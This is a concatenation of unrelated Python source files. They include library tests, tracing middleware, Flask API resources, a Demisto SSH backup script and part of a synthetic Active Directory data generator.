):
# Arrange
if network.show_active() not in ["development"] or "fork" in network.show_active():
pytest.skip("Only for local testing")
advanced_collectible = AdvancedCollectible.deploy(
get_vrf_coordinator.address,
get_link_token.address,
get_keyhash,
{"from": get_account},
)
get_link_token.transfer(
advanced_collectible.address, chainlink_fee * 3, {"from": get_account}
)
# Act
transaction_receipt = advanced_collectible.createCollectible(
"None", get_seed, {"from": get_account}
)
requestId = transaction_receipt.events["requestedCollectible"]["requestId"]
assert isinstance(transaction_receipt.txid, str)
get_vrf_coordinator.callBackWithRandomness(
requestId, 777, advanced_collectible.address, {"from": get_account}
)
# Assert
assert advanced_collectible.tokenCounter() > 0
assert isinstance(advanced_collectible.tokenCounter(), int)
|
1697233
|
import pickle
from blinker._utilities import symbol
def test_symbols():
foo = symbol('foo')
assert foo.name == 'foo'
assert foo is symbol('foo')
bar = symbol('bar')
assert foo is not bar
assert foo != bar
assert not foo == bar
assert repr(foo) == 'foo'
def test_pickled_symbols():
foo = symbol('foo')
for protocol in 0, 1, 2:
roundtrip = pickle.loads(pickle.dumps(foo))
assert roundtrip is foo
|
1697279
|
import math
class Queue(object):
def __init__(self):
self.__values = []
def enqueue(self, v):
self.__values.insert(0, v)
def dequeue(self):
if len(self.__values) == 0:
return None
else:
return self.__values.pop()
def len(self):
return len(self.__values)
|
1697282
|
from ._operation import RingQK, RingAV
from .layers import TransformerSelfAttentionRing
__all__ = ['TransformerSelfAttentionRing', 'RingAV', 'RingQK']
|
1697339
|
import abc
import enum
from typing import Any, Dict, List, Tuple, Union
import numpy as np
import pandas as pd
Record = Dict[str, Any]
Records = List[Record]
InputRecords = Union[Records, pd.DataFrame]
DataRecord = Tuple[Dict[str, Union[np.ndarray, float]], ...]
BatchDataRecords = Tuple[Dict[str, np.ndarray], ...]
RecordScore = Dict[str, np.ndarray]
BatchRecordScores = List[RecordScore]
class RecordMode(enum.Enum):
TRAIN = 0
VALIDATION = 1
SCORE = 2
class RecordLoader(abc.ABC):
"""Class for loading records into DataRecord.
Args:
mode: RecordMode, load mode.
"""
def __init__(self, mode: RecordMode, **params):
self.mode = mode
def __call__(self, record: Record) -> DataRecord:
return self.load(record)
@abc.abstractmethod
def load(self, record: Record) -> DataRecord: # pragma: no cover
"""Method for loading a record into DataRecord.
Args:
record: Record, record.
Returns:
DataRecord, data record.
"""
raise NotImplementedError()
class RecordTransformer(abc.ABC):
"""Class that computes a transform on training data records & applys
transform to validation and scoring data records (network input), ability
to pass computed network params to the network builder, and
ability to apply inverse transforms on record scores (network output).
Args:
mode: RecordMode, transform mode.
loader: RecordLoader, record loader.
"""
def __init__(self, mode: RecordMode, loader: RecordLoader, **params):
self.mode = mode
self.loader = loader
self._network_params = {} # type: dict
@abc.abstractmethod
def fit(self, records: Records): # pragma: no cover
"""Fit transform to records.
Args:
records: Records, records.
"""
raise NotImplementedError()
@abc.abstractmethod
def transform(self, data_record: DataRecord) -> DataRecord: # pragma: no cover
"""Apply transform to a data record.
Args:
data_record: DataRecord, data record.
Returns:
DataRecord, data record.
"""
raise NotImplementedError()
@abc.abstractmethod
def postprocess(self, score: RecordScore) -> RecordScore: # pragma: no cover
"""Postprocess score to undo transform.
Args:
score: RecordScore, record output from net.
Returns:
RecordScore, postprocessed record output from net.
"""
raise NotImplementedError()
@abc.abstractmethod
def load(self, path: str): # pragma: no cover
"""Load transformer.
Args:
path: str.
"""
raise NotImplementedError()
@abc.abstractmethod
def save(self, path: str): # pragma: no cover
"""Save transformer.
Args:
path: str.
"""
raise NotImplementedError()
@property
def network_params(self) -> dict:
"""Special params passed to the network builder."""
return self._network_params
@network_params.setter
def network_params(self, x):
if not isinstance(x, dict):
raise TypeError("network_params must be a dict")
self._network_params = x
|
1697395
|
SECRET_KEY = 'tests'
INSTALLED_APPS = [
"drynk",
"drynk.tests",
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'drynk.sqlite3',
}
}
|
1697402
|
import json
import functools
IOS_OSS_APPS_DATASET = "../oss_ios_apps/contents_july_2018.json"
@functools.lru_cache()
def get_project(gh_user, gh_project):
"""Ola."""
project_name = f"{gh_user}/{gh_project}"
datastore = _read_app_dataset()
projects = datastore['projects']
return next(
(project
for project in projects
if project_name in project['source']),
None
)
@functools.lru_cache()
def get_itunes_id(gh_user, gh_project):
project = get_project(gh_user, gh_project)
itunes_url = project.get('itunes')
if itunes_url:
return itunes_url.split('/id')[-1]
return None
@functools.lru_cache()
def _read_app_dataset():
"""Parse json object with app informatino."""
with open(IOS_OSS_APPS_DATASET, 'r') as input_file:
datastore = json.load(input_file)
return datastore
|
1697470
|
import struct
from typing import Optional
from bxgateway import ont_constants
from bxgateway.messages.ont.ont_message import OntMessage
from bxgateway.messages.ont.ont_message_type import OntMessageType
class VerAckOntMessage(OntMessage):
MESSAGE_TYPE = OntMessageType.VERACK
def __init__(self, magic: Optional[int] = None, is_consensus: Optional[bool] = None,
buf: Optional[bytearray] = None):
if buf is None:
buf = bytearray(ont_constants.ONT_HDR_COMMON_OFF + ont_constants.ONT_CHAR_LEN)
self.buf = buf
off = ont_constants.ONT_HDR_COMMON_OFF
struct.pack_into("<?", buf, off, is_consensus)
off += ont_constants.ONT_CHAR_LEN
super().__init__(magic, self.MESSAGE_TYPE, off - ont_constants.ONT_HDR_COMMON_OFF, buf)
else:
self.buf = buf
self._memoryview = memoryview(buf)
self._magic = self._command = self._payload_len = self._checksum = None
self._payload = None
self._is_consensus = None
def is_consensus(self) -> bool:
if self._is_consensus is None:
off = ont_constants.ONT_HDR_COMMON_OFF
self._is_consensus, = struct.unpack_from("<?", self.buf, off)
is_consensus = self._is_consensus
assert isinstance(is_consensus, bool)
return is_consensus
|
1697486
|
import pytest
import shutil
from pathlib import Path
from click.testing import CliRunner
from bnmutils import ConfigParser
from bnmutils.novelty import cd
from logme.exceptions import LogmeError
from logme.utils import get_logger_config
from logme import __version__
from logme import cli
class TestCli:
@classmethod
def setup_class(cls):
cls.runner = CliRunner()
def test_version(self):
result = self.runner.invoke(cli, ['-v'])
assert f"version {__version__}" in result.output
# ---------------------------------------------------------------------------
# 'logme init' test
# ---------------------------------------------------------------------------
@pytest.mark.parametrize('file_path, cmd_args',
[pytest.param('logme.ini', ['init'],
id='init from root dir'),
pytest.param('dir2/logme.ini', ['init', '-p', 'dir2', '-mk'],
id='init with an additional dir -relative path')])
def test_init(self, tmpdir, file_path, cmd_args):
expected_file = Path(tmpdir.join(file_path))
with cd(tmpdir):
result = self.runner.invoke(cli, cmd_args)
assert result.exit_code == 0
assert expected_file.is_file()
conf = ConfigParser.from_files(expected_file)
assert conf.sections() == ['colors', 'logme']
# Assert the first section is the color config
with open(expected_file) as file:
line = file.readline()
assert line == '[colors]\n'
def test_init_absolute_root_path(self, tmpdir):
root_path = Path(tmpdir.join('dir_abs'))
with cd(tmpdir):
result = self.runner.invoke(cli, ['init', '-p', str(root_path), '-mk'])
assert result.exit_code == 0
assert (root_path / 'logme.ini').is_file()
@pytest.mark.parametrize('option, key, expected',
[pytest.param(['-lvl', 'INFO'], ['logme', 'level'], 'INFO',
id='with custom level'),
pytest.param(['-lvl', 'error'], ['logme', 'level'], 'ERROR',
id='with custom level as lower case string'),
pytest.param(['-lvl', '50'], ['logme', 'level'], '50',
id='with custom level as integer'),
pytest.param(['-f', '{name} : {message}'], ['logme', 'formatter'],
'{name} : {message}',
id='with custom formatter'),
])
def test_init_file_change(self, tmpdir, option, key, expected):
self.runner.invoke(cli, ['init', '-p', tmpdir] + option)
conf = ConfigParser.from_files(tmpdir.join('logme.ini'))
assert conf.get(*key) == expected
def test_init_chained_options(self, tmpdir):
tmp = tmpdir.join('my_project')
self.runner.invoke(cli, ['init', '-p', tmp,
'-mk', '-lp', tmp.join('var/log/dummy.log')])
config = ConfigParser.from_files(tmp.join('logme.ini'))
fh_conf = config.to_dict(section='logme', option='file')
assert fh_conf['filename'] == tmp.join('var/log/dummy.log')
assert set(fh_conf.keys()) == {'active', 'level', 'filename', 'type'}
def test_init_raise_invalid_dir(self, tmpdir):
with cd(tmpdir):
result = self.runner.invoke(cli, ['init', '-p', 'blah'])
with pytest.raises(NotADirectoryError) as e_info:
raise result.exception
assert e_info.value.args[0] == f"{tmpdir.join('blah')} does not exist. If you'd " \
f"like to make the directory, please use '-mk' flag."
def test_init_raise_conf_exists(self, tmpdir):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
logme_path = Path(tmpdir) / 'logme.ini'
assert logme_path.exists()
result = self.runner.invoke(cli, ['init'])
with pytest.raises(LogmeError) as e_info:
raise result.exception
assert e_info.value.args[0] == f"logme.ini already exists at {logme_path}"
def test_init_override(self, tmpdir):
with cd(tmpdir):
# Before override
self.runner.invoke(cli, ['init', '-lvl', 'error'])
logme_path = Path(tmpdir) / 'logme.ini'
conf_content_before = get_logger_config(logme_path)
assert conf_content_before['level'] == 'ERROR'
self.runner.invoke(cli, ['init', '-o'])
conf_content_after = get_logger_config(logme_path)
assert conf_content_after['level'] == 'DEBUG'
# ---------------------------------------------------------------------------
# 'logme add' test
# ---------------------------------------------------------------------------
def test_add_command(self, tmpdir):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
result = self.runner.invoke(cli, ['add', 'blah'])
config_path = tmpdir.join('logme.ini')
config = ConfigParser.from_files(config_path)
assert result.exit_code == 0
assert Path(config_path).is_file()
assert set(config.sections()) == {'colors', 'logme', 'blah'}
def test_add_command_no_file(self, tmpdir):
with cd(tmpdir):
with pytest.raises(FileNotFoundError):
result = self.runner.invoke(cli, ['add', 'blah'])
raise result.exception
# ---------------------------------------------------------------------------
# 'logme remove' test
# ---------------------------------------------------------------------------
def test_remove_command(self, tmpdir):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
self.runner.invoke(cli, ['add', 'test'])
config_path = tmpdir.join('logme.ini')
config_before = ConfigParser.from_files(config_path)
assert set(config_before.sections()) == {'colors', 'logme', 'test'}
result = self.runner.invoke(cli, ['remove', 'test'])
config_after = ConfigParser.from_files(config_path)
assert result.exit_code == 0
assert config_after.sections() == ['colors', 'logme']
@pytest.mark.parametrize('conf_name, message',
[
pytest.param('logme', "'logme' master configuration cannot be removed!",
id='when trying to remove logme master config'),
pytest.param('colors', "'colors' configuration cannot be removed! To remove "
"color logging, set all color values to 'None'",
id='when trying to remove color config')
])
def test_remove_raise(self, tmpdir, conf_name, message):
with cd(tmpdir):
self.runner.invoke(cli, ['init'])
with pytest.raises(LogmeError) as e_info:
result = self.runner.invoke(cli, ['remove', conf_name])
raise result.exception
assert e_info.value.args[0] == message
# ---------------------------------------------------------------------------
# 'logme upgrade' test
# ---------------------------------------------------------------------------
def test_upgrade_command(self, tmpdir):
local_logme_file = Path(__file__).parent / 'logme.ini'
tmpdir_file = tmpdir.join('logme.ini')
shutil.copyfile(local_logme_file, tmpdir_file)
with cd(tmpdir):
result = self.runner.invoke(cli, ['upgrade'])
assert result.output.strip() == f"{tmpdir_file} has been updated to {__version__}"
|
1697488
|
from .base import *
import dj_database_url
ALLOWED_HOSTS = ['.herokuapp.com']
DEBUG = False
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# overide database settings
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
|
1697563
|
import ipaddress
import sys
from contextlib import contextmanager
from types import SimpleNamespace
from typing import (
Any,
Awaitable,
Callable,
Dict,
Generator,
Iterable,
Optional,
Set,
cast,
)
import aiohttp
from aiohttp import (
TraceRequestEndParams,
TraceRequestExceptionParams,
TraceRequestStartParams,
)
from aiohttp.web import (
AbstractRoute,
Application,
HTTPException,
Request,
StreamResponse,
middleware,
)
from .constants import HTTP_METHOD, HTTP_PATH, HTTP_ROUTE, HTTP_STATUS_CODE
from .helpers import (
CLIENT,
SERVER,
TraceContext,
make_context,
parse_debug_header,
parse_sampled_header,
)
from .span import SpanAbc
from .tracer import Tracer
APP_AIOZIPKIN_KEY = "aiozipkin_tracer"
REQUEST_AIOZIPKIN_KEY = "aiozipkin_span"
__all__ = (
"setup",
"get_tracer",
"request_span",
"middleware_maker",
"make_trace_config",
"APP_AIOZIPKIN_KEY",
"REQUEST_AIOZIPKIN_KEY",
)
Handler = Callable[[Request], Awaitable[StreamResponse]]
Middleware = Callable[[Request, Handler], Awaitable[StreamResponse]]
def _set_remote_endpoint(span: SpanAbc, request: Request) -> None:
peername = request.remote
if peername is not None:
kwargs: Dict[str, Any] = {}
try:
peer_ipaddress = ipaddress.ip_address(peername)
except ValueError:
pass
else:
if isinstance(peer_ipaddress, ipaddress.IPv4Address):
kwargs["ipv4"] = str(peer_ipaddress)
else:
kwargs["ipv6"] = str(peer_ipaddress)
if kwargs:
span.remote_endpoint(None, **kwargs)
def _get_span(request: Request, tracer: Tracer) -> SpanAbc:
# builds span from incoming request, if no context found, create
# new span
context = make_context(request.headers)
if context is None:
sampled = parse_sampled_header(request.headers)
debug = parse_debug_header(request.headers)
span = tracer.new_trace(sampled=sampled, debug=debug)
else:
span = tracer.join_span(context)
return span
def _set_span_properties(span: SpanAbc, request: Request) -> None:
span_name = f"{request.method.upper()} {request.path}"
span.name(span_name)
span.kind(SERVER)
span.tag(HTTP_PATH, request.path)
span.tag(HTTP_METHOD, request.method.upper())
resource = request.match_info.route.resource
if resource is not None:
route = resource.canonical
span.tag(HTTP_ROUTE, route)
_set_remote_endpoint(span, request)
PY37 = sys.version_info >= (3, 7)
if PY37:
from contextvars import ContextVar
OptTraceVar = ContextVar[Optional[TraceContext]]
zipkin_context: OptTraceVar = ContextVar("zipkin_context", default=None)
@contextmanager
def set_context_value(
context_var: OptTraceVar, value: TraceContext
) -> Generator[OptTraceVar, None, None]:
token = context_var.set(value)
try:
yield context_var
finally:
context_var.reset(token)
def middleware_maker(
skip_routes: Optional[Iterable[AbstractRoute]] = None,
tracer_key: str = APP_AIOZIPKIN_KEY,
request_key: str = REQUEST_AIOZIPKIN_KEY,
) -> Middleware:
s = skip_routes
skip_routes_set: Set[AbstractRoute] = set(s) if s else set()
@middleware
async def aiozipkin_middleware(
request: Request, handler: Handler
) -> StreamResponse:
# route is in skip list, we do not track anything with zipkin
if request.match_info.route in skip_routes_set:
resp = await handler(request)
return resp
tracer = request.app[tracer_key]
span = _get_span(request, tracer)
request[request_key] = span
if span.is_noop:
resp = await handler(request)
return resp
if PY37:
with set_context_value(zipkin_context, span.context):
with span:
_set_span_properties(span, request)
try:
resp = await handler(request)
except HTTPException as e:
span.tag(HTTP_STATUS_CODE, str(e.status))
raise
span.tag(HTTP_STATUS_CODE, str(resp.status))
else:
with span:
_set_span_properties(span, request)
try:
resp = await handler(request)
except HTTPException as e:
span.tag(HTTP_STATUS_CODE, str(e.status))
raise
span.tag(HTTP_STATUS_CODE, str(resp.status))
return resp
return aiozipkin_middleware
def setup(
app: Application,
tracer: Tracer,
*,
skip_routes: Optional[Iterable[AbstractRoute]] = None,
tracer_key: str = APP_AIOZIPKIN_KEY,
request_key: str = REQUEST_AIOZIPKIN_KEY,
) -> Application:
"""Sets required parameters in aiohttp applications for aiozipkin.
Tracer added into application context and cleaned after application
shutdown. You can provide custom tracer_key, if default name is not
suitable.
"""
app[tracer_key] = tracer
m = middleware_maker(
skip_routes=skip_routes, tracer_key=tracer_key, request_key=request_key
)
app.middlewares.append(m)
# register cleanup signal to close zipkin transport connections
async def close_aiozipkin(app: Application) -> None:
await app[tracer_key].close()
app.on_cleanup.append(close_aiozipkin)
return app
def get_tracer(app: Application, tracer_key: str = APP_AIOZIPKIN_KEY) -> Tracer:
"""Returns tracer object from application context.
By default tracer has APP_AIOZIPKIN_KEY in aiohttp application context,
you can provide own key, if for some reason default one is not suitable.
"""
return cast(Tracer, app[tracer_key])
def request_span(request: Request, request_key: str = REQUEST_AIOZIPKIN_KEY) -> SpanAbc:
"""Returns span created by middleware from request context, you can use it
as parent on next child span.
"""
return cast(SpanAbc, request[request_key])
class ZipkinClientSignals:
"""Class contains signal handler for aiohttp client. Handlers executed
only if aiohttp session contains tracer context with span.
"""
def __init__(self, tracer: Tracer) -> None:
self._tracer = tracer
def _get_span_context(
self, trace_config_ctx: SimpleNamespace
) -> Optional[TraceContext]:
ctx = self._get_span_context_from_dict(
trace_config_ctx
) or self._get_span_context_from_namespace(trace_config_ctx)
if ctx:
return ctx
if PY37:
has_implicit_context = zipkin_context.get() is not None
if has_implicit_context:
return zipkin_context.get()
return None
def _get_span_context_from_dict(
self, trace_config_ctx: SimpleNamespace
) -> Optional[TraceContext]:
ctx = trace_config_ctx.trace_request_ctx
if isinstance(ctx, dict):
r: Optional[TraceContext] = ctx.get("span_context")
return r
return None
def _get_span_context_from_namespace(
self, trace_config_ctx: SimpleNamespace
) -> Optional[TraceContext]:
ctx = trace_config_ctx.trace_request_ctx
if isinstance(ctx, SimpleNamespace):
r: Optional[TraceContext] = getattr(ctx, "span_context", None)
return r
return None
async def on_request_start(
self,
session: aiohttp.ClientSession,
context: SimpleNamespace,
params: TraceRequestStartParams,
) -> None:
span_context = self._get_span_context(context)
if span_context is None:
return
p = params
span = self._tracer.new_child(span_context)
context._span = span
span.start()
span_name = f"client {p.method.upper()} {p.url.path}"
span.name(span_name)
span.kind(CLIENT)
ctx = context.trace_request_ctx
propagate_headers = True
if isinstance(ctx, dict):
# Check ctx is dict to be compatible with old package versions
propagate_headers = ctx.get("propagate_headers", True)
if isinstance(ctx, SimpleNamespace):
propagate_headers = getattr(ctx, "propagate_headers", True)
if propagate_headers:
span_headers = span.context.make_headers()
p.headers.update(span_headers)
async def on_request_end(
self,
session: aiohttp.ClientSession,
context: SimpleNamespace,
params: TraceRequestEndParams,
) -> None:
span_context = self._get_span_context(context)
if span_context is None:
return
span = context._span
span.finish()
delattr(context, "_span")
async def on_request_exception(
self,
session: aiohttp.ClientSession,
context: SimpleNamespace,
params: TraceRequestExceptionParams,
) -> None:
span_context = self._get_span_context(context)
if span_context is None:
return
span = context._span
span.finish(exception=params.exception)
delattr(context, "_span")
def make_trace_config(tracer: Tracer) -> aiohttp.TraceConfig:
"""Creates aiohttp.TraceConfig with enabled aiozipking instrumentation
for aiohttp client.
"""
trace_config = aiohttp.TraceConfig()
zipkin = ZipkinClientSignals(tracer)
trace_config.on_request_start.append(zipkin.on_request_start)
trace_config.on_request_end.append(zipkin.on_request_end)
trace_config.on_request_exception.append(zipkin.on_request_exception)
return trace_config
|
1697576
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
CLI_ADD = "add backup local"
BASH_ADD = '/etc/cli.sh -c "' + CLI_ADD + '"'
def main():
res = []
tbl = []
devices = demisto.get(demisto.args(), 'devices')
devicesBackupStarted = []
devicesBackupError = []
if not devices:
res.append(
{"Type": entryTypes["error"], "ContentsFormat": formats["text"], "Contents": "Received empty device list!"})
else:
devices = ','.join(devices) if isinstance(devices, list) else devices
sshArgs = {"using": devices,
"cmd": BASH_ADD
}
resSSH = demisto.executeCommand("ssh", sshArgs)
try:
for entry in resSSH:
if isError(entry) and not demisto.get(entry, 'Contents.command'):
res += resSSH
break
else:
device = entry['ModuleName']
if demisto.get(entry, 'Contents.success'):
output = demisto.get(entry, 'Contents.output')
backFileLoc = output.find("Backup file location")
result = 'Answer returned'
devicesBackupStarted.append({
'DeviceName': device,
'System': demisto.get(entry, 'Contents.system'),
'Status': ("Done" if output.find("local backup succeeded.") > -1 else "Pending"),
'Path': (output[backFileLoc, :] if backFileLoc > -1 else None)
})
else:
devicesBackupError.append(device)
output = "Output:\n" + str(demisto.get(entry, 'Contents.output')) + \
"Error:\n" + str(demisto.get(entry, 'Contents.error'))
result = 'Failed to query'
tbl.append({'DeviceName': device, 'System': demisto.get(
entry, 'Contents.system'), 'Query result': result, 'Output': output})
except Exception as ex:
res.append({"Type": entryTypes["error"], "ContentsFormat": formats["text"],
"Contents": "Error occurred while parsing output from command. "
"Exception info:\n" + str(ex) + "\n\nInvalid output:\n" + str(resSSH)})
demisto.setContext('CheckpointBackup', devicesBackupStarted)
res.append({"Type": entryTypes["note"], "ContentsFormat": formats["table"], "Contents": tbl})
demisto.results(res)
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
1697601
|
from sqlalchemy.orm.exc import NoResultFound
from flask_rest_jsonapi import ResourceDetail, ResourceList, ResourceRelationship
from flask_rest_jsonapi.exceptions import ObjectNotFound
from commandment.apps.schema import ApplicationManifestSchema, ApplicationSchema, ManagedApplicationSchema
from commandment.apps.models import db, ApplicationManifest, Application, ManagedApplication, AppstoreMacApplication, \
AppstoreiOSApplication, EnterpriseMacApplication, EnterpriseiOSApplication
class ApplicationManifestDetail(ResourceDetail):
schema = ApplicationManifestSchema
data_layer = {
'session': db.session,
'model': ApplicationManifest,
'url_field': 'application_manifest_id'
}
class ApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': Application,
'url_field': 'application_id'
}
class ApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': Application,
'url_field': 'application_id'
}
class ApplicationRelationship(ResourceRelationship):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': Application,
'url_field': 'application_id'
}
class MASApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreMacApplication,
'url_field': 'application_id'
}
class MASApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreMacApplication,
'url_field': 'application_id'
}
class IOSApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreiOSApplication,
'url_field': 'application_id'
}
class IOSApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreiOSApplication,
'url_field': 'application_id'
}
class EnterpriseMacApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseMacApplication,
'url_field': 'application_id'
}
class EnterpriseMacApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseMacApplication,
'url_field': 'application_id'
}
class EnterpriseIosApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseiOSApplication,
'url_field': 'application_id'
}
class EnterpriseIosApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseiOSApplication,
'url_field': 'application_id'
}
class ManagedApplicationDetail(ResourceDetail):
schema = ManagedApplicationSchema
data_layer = {
'session': db.session,
'model': ManagedApplication,
'url_field': 'managed_application_id',
}
class ManagedApplicationList(ResourceList):
def query(self, view_kwargs):
query_ = self.session.query(ManagedApplication)
if view_kwargs.get('application_id') is not None:
try:
self.session.query(Application).filter_by(id=view_kwargs['application_id']).one()
except NoResultFound:
raise ObjectNotFound({'parameter': 'application_id'},
"Application: {} not found".format(view_kwargs['application_id']))
else:
query_ = query_.join(Application).filter(Application.id == view_kwargs['application_id'])
return query_
schema = ManagedApplicationSchema
data_layer = {
'session': db.session,
'model': ManagedApplication,
'url_field': 'managed_application_id',
'methods': {'query': query},
}
class ManagedApplicationRelationship(ResourceRelationship):
schema = ManagedApplicationSchema
data_layer = {
'session': db.session,
'model': ManagedApplication,
'url_field': 'managed_application_id',
}
|
1697605
|
from collections import defaultdict
def count_extra_contrib(sufficient_count, n):
extra = 0
for i in range(sufficient_count):
extra += (n-(i+1))
return extra
for _ in range(int(input())):
n = int(input())
count_of_pattern = defaultdict(int)
non_sufficient_patterns = []
extra = 0
cnt = 0
sufficient_count = 0
for i in range(n):
tmp = str(input().strip())
tmp = sorted(list(set(list(tmp))))
key = ''.join(tmp)
if(len(key)==5):
sufficient_count += 1
else:
count_of_pattern[key] += 1
non_sufficient_patterns = list(count_of_pattern.keys())
m = len(non_sufficient_patterns)
for i in range(m-1):
lcnt = 0
for j in range(i+1,m):
a = list(non_sufficient_patterns[i])
b = list(non_sufficient_patterns[j])
final_dish = a+b
if(len(set(final_dish))==5):
lcnt += count_of_pattern[non_sufficient_patterns[j]]
cnt += (lcnt * count_of_pattern[non_sufficient_patterns[i]])
del count_of_pattern
print(cnt+count_extra_contrib(sufficient_count, n))
|
1697656
|
import random
from adsimulator.utils.principals import get_cn, get_sid_from_rid, get_dn
from adsimulator.utils.users import get_user_timestamp, generate_sid_history
from adsimulator.utils.boolean import generate_boolean_value
from adsimulator.utils.parameters import get_perc_param_value, print_user_generation_parameters
from adsimulator.entities.users import get_guest_user, get_default_account, get_administrator_user, get_krbtgt_user,\
get_forest_user_sid_list
from adsimulator.templates.default_values import get_complementary_value
def generate_guest_user(session, domain_name, domain_sid, parameters):
guest_user = get_guest_user(domain_name, domain_sid)
generate_user(session, guest_user, parameters)
def generate_default_account(session, domain_name, domain_sid, parameters):
default_account = get_default_account(domain_name, domain_sid)
generate_user(session, default_account, parameters)
def generate_administrator(session, domain_name, domain_sid, parameters):
administrator_user = get_administrator_user(domain_name, domain_sid)
generate_user(session, administrator_user, parameters)
def generate_krbtgt_user(session, domain_name, domain_sid, parameters):
krbtgt_user = get_krbtgt_user(domain_name, domain_sid)
generate_user(session, krbtgt_user, parameters)
def generate_user(session, user, parameters):
if get_cn(user["Properties"]["name"]) == "GUEST":
enabled_property = random.choice([True, False])
pwdneverexpires_property = random.choice([True, False])
else:
enabled_property = user["Properties"]["enabled"]
pwdneverexpires_property = user["Properties"]["pwdneverexpires"]
# New properties
savedcredentials_perc = get_perc_param_value("User", "savedcredentials", parameters)
savedcredentials = generate_boolean_value(savedcredentials_perc, get_complementary_value(savedcredentials_perc))
session.run(
"""
MERGE (n:Base {name: $name}) SET n:User, n.objectid=$sid,
n.highvalue=$highvalue, n.domain=$domain,
n.distinguishedname=$distinguishedname,
n.description=$description, n.admincount=$admincount,
n.dontreqpreauth=$dontreqpreauth, n.passwordnotreqd=$passwordnotreqd,
n.unconstraineddelegation=$unconstraineddelegation,
n.sensitive=$sensitive, n.enabled=$enabled,
n.pwdneverexpires=$pwdneverexpires, n.lastlogon=$lastlogon,
n.lastlogontimestamp=$lastlogontimestamp, n.pwdlastset=$pwdlastset,
n.serviceprincipalnames=$serviceprincipalnames, n.hasspn=$hasspn,
n.displayname=$displayname, n.email=$email, n.title=$title,
n.homedirectory=$homedirectory, n.userpassword=<PASSWORD>,
n.sidhistory=$sidhistory, n.savedcredentials=$savedcredentials
""",
name=user["Properties"]["name"],
sid=user["ObjectIdentifier"],
highvalue=user["Properties"]["highvalue"],
domain=user["Properties"]["domain"],
distinguishedname=user["Properties"]["distinguishedname"],
description=user["Properties"]["description"],
admincount=user["Properties"]["admincount"],
dontreqpreauth=user["Properties"]["dontreqpreauth"],
passwordnotreqd=user["Properties"]["passwordnotreqd"],
unconstraineddelegation=user["Properties"]["unconstraineddelegation"],
sensitive=user["Properties"]["sensitive"],
enabled=enabled_property,
pwdneverexpires=pwdneverexpires_property,
lastlogon=user["Properties"]["lastlogon"],
lastlogontimestamp=user["Properties"]["lastlogontimestamp"],
pwdlastset=user["Properties"]["pwdlastset"],
serviceprincipalnames=user["Properties"]["serviceprincipalnames"],
hasspn=user["Properties"]["hasspn"],
displayname=user["Properties"]["displayname"],
email=user["Properties"]["email"],
title=user["Properties"]["title"],
homedirectory=user["Properties"]["homedirectory"],
userpassword=user["Properties"]["userpassword"],
sidhistory=user["Properties"]["sidhistory"],
savedcredentials=savedcredentials
)
def link_default_users_to_domain(session, domain_name, domain_sid):
standard_users_list = get_forest_user_sid_list(domain_name, domain_sid)
for user in standard_users_list:
add_contains_object_on_domain_relationship(session, user)
def add_contains_object_on_domain_relationship(session, ad_object):
query = "MATCH (objectItem:" + ad_object["ObjectType"] + " {objectid: '" + ad_object["ObjectId"] + "'}), (domainItem:Domain {objectid: '" + ad_object["DomainId"] + "'})"
query = query + "\nMERGE (domainItem)-[:Contains {isacl:false}]->(objectItem)"
session.run(query)
def generate_users(session, domain_name, domain_sid, num_nodes, current_time, first_names, last_names, users, ridcount, parameters):
user_properties_list = []
group_name = "DOMAIN USERS@{}".format(domain_name)
enabled_perc = get_perc_param_value("User", "enabled", parameters)
dontreqpreauth_perc = get_perc_param_value("User", "dontreqpreauth", parameters)
hasspn_perc = get_perc_param_value("User", "hasspn", parameters)
passwordnotreqd_perc = get_perc_param_value("User", "passwordnotreqd", parameters)
pwdneverexpires_perc = get_perc_param_value("User", "pwdneverexpires", parameters)
unconstraineddelegation_perc = get_perc_param_value("User", "unconstraineddelegation", parameters)
sidhistory_perc = get_perc_param_value("User", "sidhistory", parameters)
# New properties
savedcredentials_perc = get_perc_param_value("User", "savedcredentials", parameters)
print_user_generation_parameters(enabled_perc, dontreqpreauth_perc, hasspn_perc, passwordnotreqd_perc, pwdneverexpires_perc, unconstraineddelegation_perc, sidhistory_perc)
props = []
for i in range(1, num_nodes + 1):
first = random.choice(first_names)
last = random.choice(last_names)
user_name = "{}{}{:05d}@{}".format(first[0], last, i, domain_name).upper()
user_name = user_name.format(first[0], last, i).upper()
users.append(user_name)
dispname = "{} {}".format(first, last)
enabled = generate_boolean_value(enabled_perc, get_complementary_value(enabled_perc))
dontreqpreauth = generate_boolean_value(dontreqpreauth_perc, get_complementary_value(dontreqpreauth_perc))
hasspn = generate_boolean_value(hasspn_perc, get_complementary_value(hasspn_perc))
passwordnotreqd = generate_boolean_value(passwordnotreqd_perc, get_complementary_value(passwordnotreqd_perc))
pwdneverexpires = generate_boolean_value(pwdneverexpires_perc, get_complementary_value(pwdneverexpires_perc))
unconstraineddelegation = generate_boolean_value(unconstraineddelegation_perc, get_complementary_value(unconstraineddelegation_perc))
sidhistory = generate_sid_history(sidhistory_perc, get_complementary_value(sidhistory_perc))
pwdlastset = get_user_timestamp(current_time, enabled)
